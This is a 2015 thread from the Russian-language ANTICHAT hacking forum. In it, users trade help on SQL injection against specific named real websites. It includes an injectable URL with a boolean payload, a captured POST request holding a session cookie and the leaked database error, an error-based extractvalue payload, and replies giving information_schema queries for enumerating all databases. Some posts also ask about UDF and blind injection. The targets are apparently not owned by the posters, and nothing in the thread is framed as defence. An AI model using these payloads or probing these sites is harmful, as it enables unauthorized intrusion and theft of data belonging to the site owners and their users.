ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

06.10.2015, 02:29
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
|
|
|

06.10.2015, 17:14
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
|
|
|
|

07.10.2015, 02:30
|
|
Guest
Сообщений: n/a
Провел на форуме: 11851
Репутация:
30
|
|
Сообщение от vikler
vikler said:
↑
Код:
Code:
http://mmp.nl/openfoto.asp?foto=453096142 AND 1=1&Weergave=Liggend&tabel=sportbeelden
Не могу вытащить ничего sqlmap'ом - Oracle вроде как но
[ERROR] unable to retrieve the number of databases
Там не Oracle, а Microsoft Access.
|
|
|
|

07.10.2015, 13:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 2532
Репутация:
0
|
|
Приветствую, помогите со скулей, сканер накорырял. хттп://karelia.pro/kondopoga/business-internet/ там,
справа есть форма "Заявка на подключение". В POST запросе передается пара-тройка параметров, но ошибка возникает,
если запрос повторить, вылазит ошибка.
MySql error: Duplicate entry '89.234.157.254-2015-10-07 12:23:38' for key 'PRIMARY'
query: INSERT INTO `business_logs`(`ip`, `date`, `oper`) VALUES ('89.234.157.254', NOW(), 'none')
POST /apatity/business-internet/ HTTP/1.1
Host: karelia.pro
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://karelia.pro/apatity/business-internet/
Cookie: __utma=86736642.1434525950.1444154760.1444207012.1 444209648.5; __utmz=86736642.1444154760.1.1.utmcsr=(direct)|utm ccn=(direct)|utmcmd=(none); PHPSESSID=bc74f0fe64381cab78e74ac0e4d67963; __utmb=86736642.2.10.1444209648; __utmc=86736642; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
name=%C8%ED%ED%E0&city=%C0%EF%E0%F2%E8%F2%FB&stree t=%CC%FB%EB%EA%E0&house=65&FIO=%C3%F0%F3%F8%E5%E2% F1%EA%E0%FF&phone=3336324&info=&send=%A0
не могу раздуплить где формируються параметры из ошибки, откуда ковырять. Sqlmap-ом утюжил пол ночи, он тоже не понимает, только
false positive. Единственное не пробовал в headers ижектить. Посмотрел заголовки в burb, походу како-то js скрипт эту инфу отправляет.
Можно это как то раскрутить?
|
|
|
|

07.10.2015, 16:14
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Привет. Подскажите пожалуйста про UDF-injection . Как понять "пользовательские функции"
и по реализации. какие отличия, минусы, плюсы. Спасибо.
|
|
|
|

07.10.2015, 16:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 216062
Репутация:
231
|
|
|
|
|
|

09.10.2015, 07:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 11344
Репутация:
5
|
|
Привет. Столкнулся с таким вопросом. Есть сайт, скульмапом я его расковырял давно (там тайм-бейсед). Теперь хочу руками, получаю данные с помощью extravalue. С текущей базой все хорошо, но я точно знаю что баз несколько. Как изменить вот такой запрос -
Код:
Code:
extractvalue(0x0a,/*!50000concat*/(0x0a,(select database())))
для работы с другими базами (как перебрать имена всех баз)?
|
|
|
|

09.10.2015, 09:12
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
Сообщение от AlexG
AlexG said:
↑
для работы с другими базами (как перебрать имена всех баз)?
select table_schema from information_schema.tables limit 1,1
|
|
|
|

09.10.2015, 09:54
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме: 70640
Репутация:
0
|
|
Сообщение от AlexG
AlexG said:
↑
Привет. Столкнулся с таким вопросом. Есть сайт, скульмапом я его расковырял давно (там тайм-бейсед). Теперь хочу руками, получаю данные с помощью extravalue. С текущей базой все хорошо, но я точно знаю что баз несколько. Как изменить вот такой запрос -
Код:
Code:
extractvalue(0x0a,/*!50000concat*/(0x0a,(select database())))
для работы с другими базами (как перебрать имена всех баз)?
select schema_name from information_schema.schemata limit 0,1
|
|
|

09.10.2015, 12:16
|
|
Guest
Сообщений: n/a
Провел на форуме: 19071
Репутация:
10
|
|
нашел blind sql, но при проверки привилегий показывает USAGE, можно только дамп или есть еще варианты?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|